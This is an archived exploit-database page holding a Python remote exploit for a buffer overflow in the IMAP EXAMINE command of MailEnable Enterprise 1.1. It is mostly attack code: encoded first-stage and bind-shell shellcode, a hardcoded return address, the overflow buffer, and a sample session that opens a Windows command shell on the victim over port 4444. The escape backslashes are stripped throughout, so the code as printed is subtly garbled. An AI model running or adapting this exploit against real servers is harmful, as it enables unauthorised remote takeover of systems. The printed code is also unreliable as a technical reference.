MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit
# Published : 2005-12-19
# Author : muts
# Previous Title : Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit
# Next Title : Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit
#!/usr/bin/python
############################################################
#
# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
# Discovered and exploited by mati@see-security.com
# This vulnerability affects Mailenable Enterprise 1.1
# *without* the ME-10009.EXE patch.
#
# Details:
# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
# * No space for shellcode, so 1st stage shellcode is used to
#   jump back 512 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
# * Talz - for helping me out with the 1st stage shellcode
#
#		 FOR EDUCATION PURPOSES ONLY!
############################################################
# 1st stage shellcode:
############################################################
# [BITS 32]
# 
# global _start
#
# _start:
# 
# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
# 
# ;--- copy eip into ecx 
# fldz
# fnstenv [esp-12]
# pop ecx
# add cl, 10
# nop
# ;----------------------------------------------------------------------
# dec ch      ; ecx=-256;
# dec ch      ; ecx=-256;
# jmp ecx     ; lets jmp ecx (current location - 512)
############################################################
# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
#
# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
# Discovered / Coded by mati@see-security.com
#
# [+] Connecting to 192.168.1.160
# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
# [+] Logging in as ftp
# [+] a001 OK LOGIN completed
# [+] Sending evil buffer...
# [+] Done
#
# [+] Try connecting to port 4444 on victim IP - Muhahaha!
#
# root@slax:/tmp# nc -nv 192.168.1.160 4444
# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:WINNTsystem32>
#####################################################

import sys
import struct
import socket
from time import sleep

if len(sys.argv)!=5:
	print "nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
        print "nDiscovered / Coded by mati@see-security.comn"
        print "Usage: %s <ip> <port> <user> <pass>n" %sys.argv[0]
        sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Return Address - Win2k SP4 jmp ebx
returnaddress = "x66x4ax4ex7c"

# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode

sc = "x6ax05x59xd9xeexd9x74x24xf4x5bx81x73x13x16x91x9c"
sc +="x30x83xebxfcxe2xf4xcfx7fx45x44x32x65xc5xb0xd7x9b"
sc +="x0cxcexdbx6fx51xcfxf7x91x9cx30"

# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Second Stage Shellcode

sc2 = "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xfa"
sc2 +="xa8xc8x2ax83xebxfcxe2xf4x06xc2x23x67x12x51x37xd5"
sc2 +="x05xc8x43x46xdex8cx43x6fxc6x23xb4x2fx82xa9x27xa1"
sc2 +="xb5xb0x43x75xdaxa9x23x63x71x9cx43x2bx14x99x08xb3"
sc2 +="x56x2cx08x5exfdx69x02x27xfbx6ax23xdexc1xfcxecx02"
sc2 +="x8fx4dx43x75xdexa9x23x4cx71xa4x83xa1xa5xb4xc9xc1"
sc2 +="xf9x84x43xa3x96x8cxd4x4bx39x99x13x4ex71xebxf8xa1"
sc2 +="xbaxa4x43x5axe6x05x43x6axf2xf6xa0xa4xb4xa6x24x7a"
sc2 +="x05x7exaex79x9cxc0xfbx18x92xdfxbbx18xa5xfcx37xfa"
sc2 +="x92x63x25xd6xc1xf8x37xfcxa5x21x2dx4cx7bx45xc0x28"
sc2 +="xafxc2xcaxd5x2axc0x11x23x0fx05x9fxd5x2cxfbx9bx79"
sc2 +="xa9xfbx8bx79xb9xfbx37xfax9cxc0xd9x76x9cxfbx41xcb"
sc2 +="x6fxc0x6cx30x8ax6fx9fxd5x2cxc2xd8x7bxafx57x18x42"
sc2 +="x5ex05xe6xc3xadx57x1ex79xafx57x18x42x1fxe1x4ex63"
sc2 +="xadx57x1ex7axaexfcx9dxd5x2ax3bxa0xcdx83x6exb1x7d"
sc2 +="x05x7ex9dxd5x2axcexa2x4ex9cxc0xabx47x73x4dxa2x7a"
sc2 +="xa3x81x04xa3x1dxc2x8cxa3x18x99x08xd9x50x56x8ax07"
sc2 +="x04xeaxe4xb9x77xd2xf0x81x51x03xa0x58x04x1bxdexd5"
sc2 +="x8fxecx37xfcxa1xffx9ax7bxabxf9xa2x2bxabxf9x9dx7b"
sc2 +="x05x78xa0x87x23xadx06x79x05x7exa2xd5x05x9fx37xfa"
sc2 +="x71xffx34xa9x3exccx37xfcxa8x57x18x42x15x66x28x4a"
sc2 +="xa9x57x1exd5x2axa8xc8x2a"

buffer = 'x90'*568 + sc2 + 'x90'*53 + returnaddress + 'xEBx04' + 'x90'*4 + sc

print "nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
print "Discovered / Coded by mati@see-security.comn"
print "[+] Connecting to " + sys.argv[1]
try:
	s.connect((sys.argv[1],int(sys.argv[2])))
except:
        print "Could not connect to IMAP server!"
        sys.exit(0)

data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Logging in as %s" % sys.argv[3]
s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'rn')
data = s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
s.send('A001 EXAMINE ' + buffer+'rn')
s.close()
print "[+] Donen"
print "[+] Try connecting to port 4444 on victim IP - Muhahaha!n"

# www.Syue.com [2005-12-19]